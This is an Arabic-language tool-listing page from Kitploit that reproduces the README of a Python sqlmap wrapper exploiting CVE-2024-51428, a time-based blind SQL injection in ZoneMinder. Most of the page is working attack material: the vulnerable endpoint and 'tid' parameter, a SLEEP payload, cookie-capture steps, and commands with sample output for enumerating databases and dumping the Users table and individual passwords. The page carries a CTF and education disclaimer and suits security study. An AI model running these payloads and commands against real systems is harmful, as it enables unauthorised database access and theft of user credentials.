Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-51428-PoC — غلاف بلغة بايثون لاستغلال CVE-2024-51428 في ZoneMinder باستخدام حقن SQL الأعمى عبر sqlmap، مع أتمتة تعداد قواعد البيانات والجداول واستخراج البيانات بمخرجات نظيفة. | Kitploit
أدوات/GitHubGitHub/d1se0/cve-2024-51428-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليم
GitHubd1se0/cve-2024-51428-poc

CVE-2024-51428-PoC

غلاف بلغة بايثون لاستغلال CVE-2024-51428 في ZoneMinder باستخدام حقن SQL الأعمى عبر sqlmap، مع أتمتة تعداد قواعد البيانات والجداول واستخراج البيانات بمخرجات نظيفة.

عرض المستودع
1منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-51428 - إثبات مفهوم لثغرة حقن SQL الأعمى في ZoneMinder

غلاف بايثون لـ sqlmap مصمم لاستغلال CVE-2024-51428 في ZoneMinder.
تعمل هذه الأداة على أتمتة اكتشاف واستغلال ثغرة حقن SQL الأعمى مع إبقاء المخرجات نظيفة ومركّزة على البيانات المفيدة.

يُخفي السكربت سجلات sqlmap ولا يعرض سوى المعلومات ذات الصلة مثل:

  • نقطة الحقن المكتشفة
  • أسماء قواعد البيانات
  • الجداول
  • بيانات الاعتماد أو البيانات الحساسة المُفرَّغة

وهذا يجعل الأداة مثالية لبيئات CTF والعروض التوضيحية واختبار الأمان.


نظرة عامة على الثغرة

CVE: CVE-2024-51428
النوع: حقن SQL الأعمى
البرنامج المتأثر: ZoneMinder
متجه الهجوم: معامل HTTP GET
المعامل: tid

توجد الثغرة في نقطة النهاية التالية:

root@kitploit:~
/zm/index.php?view=request&request=event&action=removetag&tid=

لا يتم تطهير المعامل tid بشكل صحيح قبل استخدامه في استعلام قاعدة البيانات، مما يسمح للمهاجمين بحقن استعلامات SQL.

تقنية الاستغلال المستخدمة هي حقن SQL الأعمى القائم على الوقت.

مثال على الحمولة المكتشفة بواسطة sqlmap:

root@kitploit:~
tid=1 AND (SELECT 3475 FROM (SELECT(SLEEP(5)))BZWD)

تفرض هذه الحمولة على قاعدة البيانات السكون (sleep) إذا تم تنفيذ الاستعلام بنجاح، مما يؤكد وجود حقن SQL.


الميزات

  • اكتشاف تلقائي لحقن SQL الأعمى
  • تعداد قواعد البيانات
  • تعداد الجداول
  • تفريغ الجداول
  • تصفية الأعمدة
  • تصفية الصفوف
  • مخرجات نظيفة (سجلات sqlmap مخفية)
  • مصمم لبيئات CTF ومختبرات اختبار الاختراق

المتطلبات

  • Python 3
  • sqlmap

ثبّت sqlmap إذا لزم الأمر:

root@kitploit:~
sudo apt install sqlmap

الاستخدام

الصيغة الأساسية:

root@kitploit:~
python3 poc.py --url <TARGET_URL> -c '<ZMSESSID_COOKIE>'

بهذا الأمر نتحقق مما إذا كان الهدف عرضة للثغرة أم لا

مثال:

root@kitploit:~
python3 poc.py --url http://target.htb -c '151fvdqmjkhnkfat7l5epgmd22'

الحصول على ملف تعريف الارتباط المطلوب

يتطلب الاستغلال ملف تعريف ارتباط جلسة صالحًا لـ ZoneMinder.

الخطوات:

  1. افتح الهدف في متصفحك
  2. افتح أدوات المطور
  3. انتقل إلى:
root@kitploit:~
Application → Cookies
  1. ابحث عن ملف تعريف الارتباط المسمى:
root@kitploit:~
ZMSESSID
  1. انسخ قيمته واستخدمها مع -c

مثال:

root@kitploit:~
-c '151fvdqmjkhnkfat7l5epgmd22'

التحقق مما إذا كان الهدف عرضة للثغرة

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE'

مثال على المخرجات:

root@kitploit:~
[*] Checking vulnerability...

Parameter: tid (GET)
Type: time-based blind
Payload: tid=1 AND (SELECT(SLEEP(5)))

[+] TARGET IS VULNERABLE TO BLIND SQL INJECTION

تعداد قواعد البيانات

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d

مثال على المخرجات:

root@kitploit:~
available databases [3]:
information_schema
mysql
zm

تعداد الجداول

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm

مثال على المخرجات:

root@kitploit:~
Database: zm

Users
Events
Monitors
Storage

تفريغ جدول

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm -t Users

تفريغ عمود محدد

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm -t Users -f Username

مثال:

root@kitploit:~
+----------+
| Username |
+----------+
| admin    |
| viewer   |
+----------+

تصفية الصفوف (جملة WHERE)

يمكنك تصفية الصفوف باستخدام:

root@kitploit:~
-ff <COLUMN> <VALUE>

مثال:

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm -t Password -ff Username mark

ما يعادله في SQL:

root@kitploit:~
WHERE Username='mark'

تفريغ كلمة مرور مستخدم محدد

مثال:

root@kitploit:~
python3 poc.py \
--url http://target.htb \
-c 'COOKIE' \
-d -db zm -t Users \
-f Password \
-ff Username mark

الأمر الداخلي لـ sqlmap:

root@kitploit:~
sqlmap -D zm -T Users -C Password --where="Username='mark'" --dump

كيف تعمل الأداة

يعمل السكربت كغلاف حول sqlmap.

الخطوات المنفذة داخليًا:

  1. بناء نقطة النهاية المعرضة للثغرة
root@kitploit:~
/zm/index.php?view=request&request=event&action=removetag&tid=1
  1. تمرير ملف تعريف ارتباط المصادقة إلى sqlmap
  2. تنفيذ sqlmap مع خيارات محسّنة:
root@kitploit:~
--threads=10
--technique=T
--batch
  1. تحليل مخرجات sqlmap في الوقت الفعلي
  2. تصفية السجلات وعرض ما يلي فقط:
  • معلومات الحقن
  • قواعد البيانات
  • الجداول
  • البيانات المُفرَّغة

الاستخدام المقصود

أُنشئت هذه الأداة من أجل:

  • تحديات التقاط العلم (CTF)
  • البحث الأمني
  • الأغراض التعليمية
  • مختبرات اختبار الاختراق

إخلاء مسؤولية

يُقدَّم هذا المشروع للأغراض التعليمية واختبارات الأمان المصرح بها فقط.

المؤلف غير مسؤول عن أي إساءة استخدام لهذه الأداة.

احصل دائمًا على التفويض المناسب قبل اختبار أي نظام.


المؤلف

البحث الأمني / أدوات CTF

تنزيل الأداة